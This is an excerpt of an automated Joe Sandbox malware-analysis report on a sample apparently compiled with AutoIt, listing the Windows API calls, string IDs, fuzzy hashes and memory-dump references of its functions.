                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$Show
                                                                      • String ID: AutoIt v3$d$edit
                                                                      • API String ID: 2813641753-2600919596
                                                                      • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                      • Instruction ID: b72f02b878fa18acf8f48a0fc2345963c456ae238b1df44c7cd586fac59f84c8
                                                                      • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                      • Instruction Fuzzy Hash: 65219D72A2CB41C6EB50EB10F48A32977E0F788799F004238E68DD6664DFBDC085DB14

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942D8E
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942D9C
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942DAC
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942DBC
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942DCA
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942DD8
                                                                        • Part of subcall function 00007FF64393EEC8: RegisterWindowMessageW.USER32 ref: 00007FF64393EF76
                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64392106D), ref: 00007FF643928209
                                                                      • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64392106D), ref: 00007FF64392828F
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64392106D), ref: 00007FF64396D36A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: AutoIt
                                                                      • API String ID: 1986988660-2515660138
                                                                      • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                      • Instruction ID: 677e1d87d82b08f4442238b4f5ae28efdfcb582854d98426c360fc6c0d752483
                                                                      • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                      • Instruction Fuzzy Hash: E4C10871D9CB6285FA40FB14E9830B47BA8BF95350F50023AE45DE2661EFBCA191E760

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                      • String ID: Line:
                                                                      • API String ID: 3135491444-1585850449
                                                                      • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                      • Instruction ID: 0bd39142e68d0d590d21d7a85b28489bbbaf47ad2ebe0a3509667068b95fe831
                                                                      • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                      • Instruction Fuzzy Hash: 37417832A0CA4696EB20FB20E5422F93761FB45344F945435E68CE369BEF7CE548E750
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32 ref: 00007FF64396BAA2
                                                                        • Part of subcall function 00007FF6439256D4: GetFullPathNameW.KERNEL32(?,00007FF6439256C1,?,00007FF643927A0C,?,?,?,00007FF64392109E), ref: 00007FF6439256FF
                                                                        • Part of subcall function 00007FF643923EB4: GetLongPathNameW.KERNELBASE ref: 00007FF643923ED8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                      • API String ID: 779396738-2360590182
                                                                      • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                      • Instruction ID: 142b49bd084a4102e858ff7937920a03d6c0b27b59892748323b048f2d03ef0a
                                                                      • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                      • Instruction Fuzzy Hash: 02318A2260CB8289E710FB21E9411AD77A8FB49B84F584535EA8CD3B9AEF3CD545DB00
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                      • String ID:
                                                                      • API String ID: 3812282468-0
                                                                      • Opcode ID: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
                                                                      • Instruction ID: 18f8c6fece3c17af2a13623395e8e6f4dc3a46b7d703cafcfd2e52f1e3b946a5
                                                                      • Opcode Fuzzy Hash: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
                                                                      • Instruction Fuzzy Hash: 8231F322A1C7C287FB65BB1191022B93799EB45FC8F184031CE4DA7B4ADE2CD644CB10
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF643926F52,?,?,?,?,?,?,00007FF64392782C), ref: 00007FF643926FA5
                                                                      • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF643926F52,?,?,?,?,?,?,00007FF64392782C), ref: 00007FF643926FD3
                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF643926F52,?,?,?,?,?,?,00007FF64392782C), ref: 00007FF643926FFA
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                      • Instruction ID: e6e84dcbf627f3192be22a37e30200bc998cf1283178b8596169e08ad0887e94
                                                                      • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                      • Instruction Fuzzy Hash: 1E218B33A1CB4187E750AF29E5419AE73A4FB48B84B441531EB8DE3B16EF39E414DB00
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                      • Instruction ID: 82affd4cbfacfe24c85fd2a4b97704f104438bdb749d5181ef2598fdf880d6e2
                                                                      • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                      • Instruction Fuzzy Hash: B3E01A20B0C70182EB44BB609C8B77A2352AF98B52F005038C81EE6393EE3DE848A700
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      • Opcode ID: 7bec802cbd1a87009617c2811a6b9062f2906cccecad6531e84376474dd06857
                                                                      • Instruction ID: 7412a2091b69e2217e094c448eac8efd8196c9bdeca1f001627d740c124d8b57
                                                                      • Opcode Fuzzy Hash: 7bec802cbd1a87009617c2811a6b9062f2906cccecad6531e84376474dd06857
                                                                      • Instruction Fuzzy Hash: 78226B72B0C6428AFB14FF65D4822AC27A1FB48B88F504536DA4DE7B96EF38E455D340
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                      • Instruction ID: 7368c91d448b6841cd57d08f194f3d7898d78ef3a89df81b4549018e5a6ff6de
                                                                      • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                      • Instruction Fuzzy Hash: CD41B53290CA4282F760BF20E5063797790EB45768F045634EA6DE7ACAEF7DD404EB40
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID:
                                                                      • API String ID: 2632591731-0
                                                                      • Opcode ID: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                                      • Instruction ID: fcf04fa373654b0ccf95202842dc9a2836ddafc839c6ddd554d9ab0756bb6e72
                                                                      • Opcode Fuzzy Hash: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                                      • Instruction Fuzzy Hash: 10413022B18A528AFB10FF25D9523FC23A0EB44788F454531EA4DE7A9AEF7CD944D740
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                      • Instruction ID: eba8245e3bdac59b4e35ae6e39df123ec173de99347abc177f3b50e6a5057ef2
                                                                      • Opcode Fuzzy Hash: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                      • Instruction Fuzzy Hash: 93416B3290DB4686EB51FF11E5423A937A8FB48B88F444435EA4CA778ADF7CE580D750
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00007FF643923756
                                                                        • Part of subcall function 00007FF643949334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643949348
                                                                        • Part of subcall function 00007FF6439236E8: SystemParametersInfoW.USER32 ref: 00007FF643923705
                                                                        • Part of subcall function 00007FF6439236E8: SystemParametersInfoW.USER32 ref: 00007FF643923725
                                                                        • Part of subcall function 00007FF6439237B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF6439237F2
                                                                        • Part of subcall function 00007FF6439237B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF643923807
                                                                        • Part of subcall function 00007FF6439237B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF64392388D
                                                                        • Part of subcall function 00007FF6439237B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF643923924
                                                                      • SystemParametersInfoW.USER32 ref: 00007FF643923797
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 4207566314-0
                                                                      • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                      • Instruction ID: 742e227f844f5342116e842c561deda3eb474f6168cf3332567bfe5eb8efd712
                                                                      • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                      • Instruction Fuzzy Hash: 70016970E5C6038AFB40FB65A9931B87B61AF18300F040035E44CE62A3EE2CB4C4AB20
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 485612231-0
                                                                      • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                      • Instruction ID: 12a4aaba5a5dd75c143f83dc312f797c18fc05050b4919037a1554c45470ded9
                                                                      • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                      • Instruction Fuzzy Hash: 84E04F52E1D103C2FE447BB2580707416915F54742B444030C90DF6253FE2C94C55B00
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast
                                                                      • String ID:
                                                                      • API String ID: 918212764-0
                                                                      • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                      • Instruction ID: 9d407374583290089dfa17592fd808125de2e051be210616455931b1314d4ac9
                                                                      • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                      • Instruction Fuzzy Hash: D311C861F0E24352FEA4B765A5D72BC12C15F947A4F041134DA2EE63D7FE6CE885A301
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                                      • Instruction ID: 14969a0c492d86f0d099c7df2e75ae5ef8382c260065a41db82edf5f0f34ca2a
                                                                      • Opcode Fuzzy Hash: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                                      • Instruction Fuzzy Hash: 1432B362A0C682C5EB64FB15D4463B96761FB88B88F144131DE5EE7BA6EF3CE441E700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                      • String ID:
                                                                      • API String ID: 3947729631-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      APIs
                                                                        • Part of subcall function 00007FF643954970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643954999
                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF64396C8FE), ref: 00007FF64392656F
                                                                      Similarity
                                                                      • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3938577545-0
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      Similarity
                                                                      • API ID: LongNamePath
                                                                      • String ID:
                                                                      • API String ID: 82841172-0
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                      • Instruction ID: cb4a4d5720fd6f7d7963a24cd844abc7e5cfa0988b2001be519a3712e122ed3e
                                                                      • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                      • Instruction Fuzzy Hash: 64F05872A1DB8687E7A1BB54E4463A97AA4F788308F844039D18DA639ADE3CD345DF10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Open_onexit
                                                                      • String ID:
                                                                      • API String ID: 3030063568-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Process$CurrentVersionWow64_onexit
                                                                      • String ID:
                                                                      • API String ID: 2932345936-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _onexit
                                                                      • String ID:
                                                                      • API String ID: 572287377-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _onexit
                                                                      • String ID:
                                                                      • API String ID: 572287377-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1452528299-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 4292702814-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 4292702814-0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                      • String ID: @GUI_DRAGID$F
                                                                      • API String ID: 1993697042-4164748364
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                                      • String ID:
                                                                      • API String ID: 3481653762-0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-2439800395
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 3778422247-2988720461
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                      • String ID:
                                                                      • API String ID: 3372153169-0
                                                                      Similarity
                                                                      • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                      • String ID: default$winsta0$winsta0\default
                                                                      • API String ID: 3202303201-1423368268
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      Similarity
                                                                      • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2880407647-0
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                      • String ID:
                                                                      • API String ID: 3222323430-0
                                                                      Similarity
                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                      • String ID:
                                                                      • API String ID: 1015379403-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 281475176-2761157908
                                                                      Similarity
                                                                      • API ID: CloseValue$ConnectCreateRegistry
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 3314541760-966354055
                                                                      Similarity
                                                                      • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                      • String ID: -$:$:$?
                                                                      • API String ID: 3440502458-92861585
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3232708057-3289030164
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                      • String ID: *.*
                                                                      • API String ID: 1111067124-438819550
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      Similarity
                                                                      • API ID: SendString
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 890592661-1007645807
                                                                      • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                      • Instruction ID: 1bf57a58d2f4d7c07a78e897ef31d2cfcb4e997a669cddee7660706c48ea92be
                                                                      • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                      • Instruction Fuzzy Hash: C9217122A0C95291E720FB24E8966BA6725FF94748FC44031E54DE799EFF3CD909D740
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                      • Instruction ID: 428753a20e15e5a7e1ec5f18783eb4c95222b312bdcf4f02cfba6b5ade7be803
                                                                      • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                      • Instruction Fuzzy Hash: 1A419311A0CA8352EA50BB15A84667963A1FF44BF4F805231DD6EE76D6FF3CD409EB00
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 3218304859-0
                                                                      • Opcode ID: 45b658a51b3e557c0ff4969c1d9b7dfee56050206255f65532400d9fc3fc3bd5
                                                                      • Instruction ID: 9733f26dac67e6c6b6706e6e0e71cc69de14b90ccc7e1712a3ece529cd903e25
                                                                      • Opcode Fuzzy Hash: 45b658a51b3e557c0ff4969c1d9b7dfee56050206255f65532400d9fc3fc3bd5
                                                                      • Instruction Fuzzy Hash: 57F19232B09A4286EB10FF65D5922AC33B0FB89B98B058531DE4DE7B96EF38D105D744
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                      • Instruction ID: 8eacccb07ec2062acca1a72bbae7a7bba8fd19685488793d9663039ee174b42c
                                                                      • Opcode Fuzzy Hash: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                      • Instruction Fuzzy Hash: BEC17C76B08B8581EB10FF2AE8861AD77A0FB88B94F054136DE4E97766EF38D445D700
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 1255039815-0
                                                                      • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
